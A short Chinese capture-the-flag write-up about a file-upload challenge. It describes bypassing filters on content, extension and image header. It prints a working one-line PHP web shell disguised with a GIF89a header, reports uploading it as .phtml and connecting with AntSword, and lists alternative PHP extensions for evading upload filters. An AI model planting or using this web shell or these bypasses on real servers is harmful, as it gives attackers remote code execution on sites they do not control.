前言
这真的是一道挺简单的题目,就是进行内容和后缀的绕过,但是我这里出了一点问题。我是用了一个png图片,直接往后面放一句话,之前的做一道文件上传的时候用的挺好的,这题发现不行。不知道是题目过滤了png图片头还是那张图片的问题。
因此去查了查WP,看了一下别的师傅的图片马的头部都是什么样的,然后就过了。
WP
这题的绕过点有三个,一个就是文件内容不能有<?,还有就是文件后缀的绕过,还有图片头。
因此图片内容如下:
GIF89a? <script language="php">eval($_REQUEST[feng])</script>
后缀的话可以用phtml来绕过。
还有一个问题就是上传之后的文件在哪。猜测还是常规的目录/upload下面,用蚁剑连成功了,确实是在upload下面。
附常见的php后缀:
php2, php3, php4, php5, phps, pht, phtm, phtml